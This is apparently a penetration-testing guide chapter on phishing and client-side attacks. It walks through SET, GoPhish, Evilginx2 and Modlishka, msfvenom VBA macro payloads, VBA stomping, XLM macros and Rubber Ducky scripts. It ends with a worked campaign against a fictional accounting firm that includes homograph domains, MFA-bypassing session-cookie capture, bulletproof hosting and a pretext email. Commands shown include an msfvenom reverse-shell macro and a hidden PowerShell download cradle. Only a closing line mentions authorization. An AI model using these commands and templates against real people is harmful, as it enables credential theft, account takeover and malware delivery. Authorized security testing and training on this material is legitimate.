Social Engineering and Client-Side Attack Vectors
The Social-Engineer Toolkit: Architecture and Customization
The Social-Engineer Toolkit (SET), developed by David Kennedy, remains the foundational framework for orchestrating client-side attacks within Kali Linux. Its modular architecture separates attack vectors into distinct components: spear-phishing, website cloning, infectious media generation, and mass-mailer functions. Understanding this architecture enables practitioners to construct realistic scenarios rather than rely on generic templates.
SET operates through a menu-driven interface, but its true power emerges through configuration files located in /etc/setoolkit/set.config. Critical parameters include WEB_PORT for listener customization, EMAIL_PROVIDER for SMTP relay integration, and AUTO_DETECT=ON for automatic payload architecture detection. The APACHE_SERVER option enables seamless integration with Apache for serving cloned sites with SSL certificate support—essential for credibility.
The spear-phishing module (setoolkit → option 1 → option 2) allows attachment-based payload delivery or template-based inline links. For attachment delivery, SET integrates with Metasploit payloads, automatically encoding executables to bypass naive signature detection. The website cloning module (setoolkit → option 1 → option 3) retrieves target sites via wget mirroring, then injects credential harvesting forms or JavaScript keyloggers. Customization extends to form field mapping: practitioners can define which input fields trigger capture and specify exfiltration endpoints beyond SET's default Flask listener.
For realistic scenarios, modify /usr/share/setoolkit/src/phishing/smtp/client/smtp_web.py to implement custom email headers matching organizational email gateway patterns. Domain fronting through legitimate cloud services, configured via the HOSTNAME variable, further enhances deliverability against heuristic filtering.
Phishing Campaign Platforms: Scale and Sophistication
While SET excels at rapid prototyping, operational campaigns demand platforms with analytics, scheduling, and team collaboration. Three tools dominate this space with distinct architectural philosophies.
GoPhish provides open-source campaign management with a web-based dashboard. Its template system supports HTML/CSS email construction with variable substitution ({{.FirstName}}, {{.TrackingURL}}). Landing pages use Go's html/template engine, enabling conditional rendering based on user-agent or geolocation. The API facilitates automation:
# Creating a campaign via GoPhish API
curl -X POST https://gophish-server:3333/api/campaigns/ \
-H "Authorization: <api-key>" \
-d '{
"name": "Q1-Financial-Review",
"template": {"name": "SharePoint Document Alert"},
"page": {"name": "Office365-Portal-Clone"},
"smtp": {"name": "relay.corporate-backup.net"},
"groups": [{"name": "accounting-targets"}],
"url": "https://secure-document-portal.net/login"
}'
Evilginx2 operates fundamentally differently. Unlike credential harvesting pages that present fake login forms, Evilginx2 functions as a reverse proxy—an architectural distinction critical for bypassing two-factor authentication. It relays requests between victims and legitimate services, capturing session cookies in real-time. The attacker obtains authenticated sessions, not merely passwords, rendering TOTP and push-notification 2FA ineffective. Configuration requires precise subdomain and phishlet definition:
# Evilginx2 phishlet for Office365
phishlets hostname o365 login.microsoftonline.com
phishlets enable o365
lures create o365
lures edit 0 redirect_url https://portal.office.com
lures get-url 0
Modlishka shares Evilginx2's reverse-proxy architecture but emphasizes automation through JSON configuration. Its plugin system enables JavaScript injection for credential pre-fetching and dynamic content rewriting. However, Evilginx2's active development and broader phishlet library make it preferable for most engagements.
Document Macro and OLE Attack Techniques
Microsoft Office documents remain potent initial access vectors, particularly in environments with restrictive web filtering. Modern attacks leverage three technical approaches with varying complexity and detection profiles.
MSFVenom macro generation provides baseline capability:
msfvenom -p windows/x64/meterpreter/reverse_https \
LHOST=192.168.45.200 LPORT=443 \
-f vba -o maldoc_macro.txt
The output embeds shellcode within AutoOpen subroutines. However, default templates trigger modern AMSI (Anti-Malware Scan Interface) and application guard heuristics.
VBA Stomping evades signature detection by manipulating the VBA project's source code persistence. Office documents store both compressed source (P-code) and compiled executable code (EXENATIVE). VBA stomping overwrites the visible source with benign content while preserving malicious P-code. The pcodedmp and evilclippy tools automate this:
# VBA stomping workflow
evilclippy -s fake_code.vba -t stomped_target.doc
The resulting document displays harmless VBA when inspected but executes malicious P-code upon triggering. Forensic analysis requires extracting both streams and comparing hashes—a step rarely performed in automated triage.
XL4 Macro Resurgence exploits Excel 4.0 macros (XLM), a legacy functionality predating VBA. XLM executes without sandbox restrictions available to modern VBA, and security vendors maintain weaker detection signatures. Tools like XLMMacroDeobfuscator extract and analyze these macros, while msfvenom's -f exe-small payload can be delivered through EXEC() formulas referencing remote resources. The resurgence reflects attacker economics: XLM support remains enabled by default in Excel for compatibility, providing minimal-friction exploitation.
USB Drop Attacks: Hardware Implants
The Hak5 Rubber Ducky and Bash Bunny represent programmable USB attack platforms that exploit trust in physical media. These devices enumerate as Human Interface Devices (HID), bypassing autorun restrictions and endpoint USB storage policies.
The Rubber Ducky executes pre-scripted keystroke sequences at superhuman speeds. Its Ducky Script language supports payload conditioning:
REM Accounting firm payload: PowerShell download cradle
DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -enc [base64-encoded-command]
ENTER
The Bash Bunny extends this with payload selection via hardware switches, multiple attack modes (HID, storage, Ethernet), and Bunny Script for logic constructs. Its Ethernet attack mode enables network manipulation through built-in DHCP and DNS services, useful for captive portal bypasses or credential relay attacks in air-gapped environments.
Physical placement maximizes psychological triggers: devices labeled "Q1 Financial Audit Results" or "Employee Compensation Review 2024" exploit authority and urgency. Tracking unique serial numbers or embedded NFC chips enables correlation between physical placement and successful execution.
Psychological Principles in Technical Attack Design
Effective social engineering operationalizes cognitive biases systematically. Three principles demand particular attention during campaign architecture.
Authority exploits hierarchical compliance. Phishing emails impersonating CFOs, external auditors, or legal counsel achieve higher click-through rates than generic IT notifications. Technical implementation requires display-name spoofing (CFO Sarah Chen <[email protected]>) and header alignment with executive communication patterns extracted from public filings or conference presentations.
Urgency bypasses analytical processing. Campaigns targeting accounting firms during quarter-close periods, tax filing deadlines, or audit windows achieve contextual relevance. Time-limited access expiration ("Your DocuSign envelope expires in 4 hours") creates artificial scarcity demanding immediate action.
Reciprocity leverages obligation creation. Free tools, whitepapers, or "exclusive industry benchmarks" provided via email establish psychological debt. The subsequent credential request appears as reasonable exchange rather than exploitation.
Worked Example: Accounting Firm Phishing Campaign
Consider "Hendricks & Associates," a mid-size firm with 340 employees, undergoing SOC 2 Type II audit preparation.
Reconnaissance: LinkedIn identifies the CFO, audit committee chair, and IT director. SEC filings reveal engagement with "Preston Audit Services." The firm uses Microsoft 365 with Azure AD conditional access.
Domain Registration: Register hendricks-associates[.]net (available) as primary, with homograph variant hẹndricks-associates[.]com using combining characters for selected high-value targets. Configure SPF, DKIM, and DMARC to match legitimate infrastructure patterns observed through DNS enumeration.
Infrastructure: Deploy Evilginx2 with custom phishlet for login.microsoftonline.com, capturing session cookies and redirecting to legitimate Office365 post-authentication to minimize suspicion. Host on bulletproof VPS with Cloudflare fronting for origin concealment.
Email Template:
From: Preston Audit Services <[email protected]>
Subject: ACTION REQUIRED: Q4 Audit Evidence Portal Access
Dear {{.FirstName}},
As part of our ongoing SOC 2 Type II engagement, we've established
a secure evidence portal for document submission.
Your access credentials were provisioned on {{.CurrentDate}}.
[Access Portal] ← Evilginx2 lure URL
This link expires in 48 hours per our MSA Section 14.2.
Direct questions to your engagement manager.
Regards,
Marcus Chen
Senior Manager, IT Risk Assurance
Preston Audit Services
Execution: Upload target list via GoPhish API with timezone-appropriate scheduling (Tuesday 9:30 AM local). Enable open tracking through 1x1 pixel; credential submissions trigger webhook notifications.
Legal Boundary: This campaign requires explicit written authorization from Hendricks & Associates' General Counsel, with defined scope, data handling procedures, and notification protocols for credential exposure. Un authorized simulation constitutes wire fraud and Computer Fraud and Abuse Act violation.